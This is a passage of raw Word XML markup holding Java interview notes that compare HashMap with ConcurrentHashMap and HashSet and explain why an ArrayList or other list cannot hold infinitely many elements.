          <w:p w14:paraId="684B57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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D668A0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1CA11A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remove(), etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0077291C" w:rsidRPr="00CE4B95" w14:paraId="19B21822" w14:textId="77777777" w:rsidTr="005A02C9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4ADEC643"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5F68CEA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ly synchronized environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52CCE67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applications requiring high concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0077291C" w:rsidRPr="00CE4B95" w14:paraId="68EBA77A" w14:textId="77777777" w:rsidTr="005A02C9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60548CF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 of the map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26B0DDE9"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external synchronization to handle large maps in concurrent environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A3E08F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arge maps efficiently in concurrent environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3384DDC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1202FF">
          <v:rect id="_x0000_i1559" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3D92D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5437BACB"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7905D269"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single-threaded environments or if external synchronization (e.g., using synchronizedMap) is acceptable for multi-threading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F66101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not a concern and you need a fast, non-synchronized map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39840544"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ncurrentHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CAE37D"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multi-threaded environments where multiple threads will read and write concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A85E77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important but you want to avoid the overhead of locking the entire map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0D646C"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tuations where high concurrency, atomic operations, and fail-safe iteration are needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BB592C" w14:textId="270C637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0" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C26666" w14:textId="3EAD4125" w:rsidR="00546A70" w:rsidRPr="00CE4B95" w:rsidRDefault="00546A70">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="193" w:name="_Toc197867407"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between HashMap and HashSet</w:t>
      </w:r>
      <w:r w:rsidR="005A02C9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="193"/>
    </w:p>
    <w:p w14:paraId="139ADEE2" w14:textId="31E169EA" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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HashSet are both part of the Java Collections Framework, but they are used for different purposes and have different internal structures. Here are the key differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37652D2A"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41ED8">
          <v:rect id="_x0000_i1561" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F826C6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ata Structure and Purpose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0985F54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31F654E"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: HashMap stores data in the form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Each entry in the map consists of a key and a corresponding value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167E4A3D"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to associate a unique key with a specific value (e.g., looking up a value based on a key).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F2C50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D7D603B"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HashSet stores only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not key-value pairs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE1843C"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a collection of unique elements, and there is no need to associate a value with an element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9AD29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01060">
          <v:rect id="_x0000_i1562" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="618E51DC"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orage Mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE73EB0"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615CB0A4"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key-value pairs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF16117"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key is hashed using its hashCode(), and the value is stored at the hashed index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36267D35"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7D9E2986"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store the elements. It uses the set's elements as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in the map, and th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re always a constant object (commonly Boolean.TRUE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AC00A0"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ssentially, HashSet is backed by a HashMap with values as dummy values (e.g., Boolean.TRUE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA0D935"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80E66D">
          <v:rect id="_x0000_i1563" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B9B35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Value vs. Single Element:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C224927"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A5D459D"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both </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>keys and values</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Each key in the map must be unique, and each key maps to a specific value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6744A054"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EC79FF0"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Each element in the set must be unique, and it does not store any associated value (unlike a map).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4FA9D4"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4BC3E">
          <v:rect id="_x0000_i1564" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A331C9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uplicates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DC4F8E"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FE4C2BE"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keys</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Each key must be unique. However, it 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the same value can be associated with different keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660FC9CA"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6BD3143"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Any attempt to add a duplicate element is ignored, as it violates the uniqueness constraint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231799E1"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486456E">
          <v:rect id="_x0000_i1565" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B770B9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Values:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0104FC00"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7443270"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You can have a null key in the map and associate it with a value (even a null value).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4FD37F"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67718826"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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the set. You can add a single null value, but only once since duplicates are not allowed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098111E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25B90">
          <v:rect id="_x0000_i1566" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37991E5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082EC642"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057877BF"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to store data where each element has a unique key, and you need to look up values based on those keys (e.g., a dictionary, cache, or database of key-value pairs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79967C7A"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1D3246F7"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F6B8C">
          <v:rect id="_x0000_i1567" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F6B99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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343BB14D"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10D94B6"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and put() operations under normal circumstances (assuming a good hash function and load factor).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310EFDBC"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728D344"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so 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 operations, as it is backed by a HashMap where each element is stored as a key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643D937E"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D913A">
          <v:rect id="_x0000_i1568" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2950470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Iteration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C1B3DC"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D1DAA02"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You can iterate over the keys, values, or both.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660FD336"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8269936"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 Since it stores only values, iteration returns only the unique elements in the set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD050E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696731">
          <v:rect id="_x0000_i1569" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BBC4A6"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3759"/>
        <w:gridCol w:w="4429"/>
      </w:tblGrid>
      <w:tr w:rsidR="00060EC8" w:rsidRPr="00CE4B95" w14:paraId="13125D17" w14:textId="77777777" w:rsidTr="00CA0BF1">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B73BFE9"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9642E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6991A27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Set</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00060EC8" w:rsidRPr="00CE4B95" w14:paraId="500E9ECB" w14:textId="77777777" w:rsidTr="00CA0BF1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4289F5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418DA83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key-value pairs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="727A11E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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00060EC8" w:rsidRPr="00CE4B95" w14:paraId="08993D7F" w14:textId="77777777" w:rsidTr="00CA0BF1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BEEA89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ntries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DC6705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duplicat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llowed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70D0780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r w:rsidR="00060EC8" w:rsidRPr="00CE4B95" w14:paraId="2BF1AD5C" w14:textId="77777777" w:rsidTr="00CA0BF1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79D8F75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Data Structure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1395CC61"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 table for key-value pairs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74CE5DC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Map internally with values as dummy values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00060EC8" w:rsidRPr="00CE4B95" w14:paraId="0EB4A036" w14:textId="77777777" w:rsidTr="00CA0BF1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7194704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6A3FCB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 keys, but values can be duplicated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C2266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s allowed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00060EC8" w:rsidRPr="00CE4B95" w14:paraId="00F77E06" w14:textId="77777777" w:rsidTr="00CA0BF1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4272EF2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Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E4D026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multiple </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>null values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B6230C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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00060EC8" w:rsidRPr="00CE4B95" w14:paraId="058A34E4" w14:textId="77777777" w:rsidTr="00CA0BF1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31AA535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E4D16E9"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map a unique key to a value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E74E53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collection of unique elements</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00060EC8" w:rsidRPr="00CE4B95" w14:paraId="19A677FE" w14:textId="77777777" w:rsidTr="00CA0BF1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="221BD45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0AEBCD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put(), and remove()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A8F61C3"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00060EC8" w:rsidRPr="00CE4B95" w14:paraId="05EEFA47" w14:textId="77777777" w:rsidTr="00CA0BF1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2256124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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B091BAB"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0777471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bl>
    <w:p w14:paraId="3C041CC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A885DD">
          <v:rect id="_x0000_i1570" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D00357"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3B1CD14F"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5B96A016"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store key-value pairs, where each key maps to a specific value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C88446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look up values based on keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B53082"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Set:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C12C631"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only care about the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>uniqueness of elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and do not need to store key-value pairs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474A0CE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deal for operations like eliminating duplicates or checking membership in a set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F60EB9" w14:textId="1A137DD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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02414196"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94" w:name="_Toc197867408"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we add infinite elements to ArrayList?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="194"/>
    </w:p>
    <w:p w14:paraId="708124DA" w14:textId="797E5593" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="008F62F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ory, you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 xml:space="preserve"> add an infinite number of elements to an ArrayList in Java, as the underlying data structure (an array) has a finite amount of memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256FAF84"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why:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AD1938"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imitations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AD5103"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internally uses an array to store its elements. As you add more elements, the array may need to be resized (increased in size).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B09A780"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ly, the JVM will run out of memory to allocate the necessary space for the array, and you'll encounter an OutOfMemoryError.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6B90F2"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Resizing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A47DA4"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internal array reaches its capacity, ArrayList resizes itself by allocating a larger array (typically 1.5 times the current size) and copying the elements over to the new array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3274BB5F"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resizing continues as long as there is enough heap memory available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4344E73B"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Memory Limits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4567935B"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actical Constraints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060CB4DA"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ArrayList grows dynamically, if you try to add more elements than the available memory can accommodate, you'll hit a limit and eventually face a memory-related exception (OutOfMemoryError).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3082B0D7"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0C6F0F0"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0B15EFF2"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true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A2D8B3"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  // Continuously adding elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7960374C"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364A81"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keep adding elements until the JVM runs out of memory and throws an OutOfMemoryError.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD52647" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008F62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4EAD">
          <v:rect id="_x0000_i1572" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="482A75E4"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FF98EA9"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add an infinite number of elements to an ArrayList. The practical limit is determined by the available memory in the system where the JVM is running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CE598C" w14:textId="1AFA087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3" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="236160EE"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95" w:name="_Toc197867409"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we store infinite elements in a list?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="195"/>
    </w:p>
    <w:p w14:paraId="4CFE1BB3" w14:textId="336459EF" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="00C34A1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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cannot store an infinite number of elements in a list</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, regardless of the type of list (like ArrayList, LinkedList, etc.) in Java. There are several limitations that prevent storing infinite elements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B796EFA"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ory Constraints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA35B91"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limitation is the amount of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>available memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Whether you're using a List or any other collection in Java, it will eventually consume all the available memory in your system (RAM) or JVM heap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FC8EFB"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store more elements than your system can handle, you'll encounter an OutOfMemoryError.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01063410"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VM and System Limits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66080D79"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memory you can use for an application is limited by the JVM configuration and the system architecture (e.g., 32-bit vs. 64-bit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB971D2"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actical Limitations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1850760F"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structures like ArrayList and LinkedList can grow dynamically, adding more and more elements will eventually lead to performance degradation as the memory consumption increases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CDDF16"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a LinkedList, while it doesn’t need contiguous memory (unlike ArrayList), each element still requires memory for storing references (pointers), and you’ll run into limitations eventually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F42D54"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Java's Long.MAX_VALUE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7BBD4A"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larger collections, you would need specialized data structures or approaches, and even then, you would run into the aforementioned memory limitations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794A3BFF" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C34A1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8A8BD">
          <v:rect id="_x0000_i1574" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FECB19B"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666467A" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="00C34A1F">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CE4B95">
        <w:rPr>
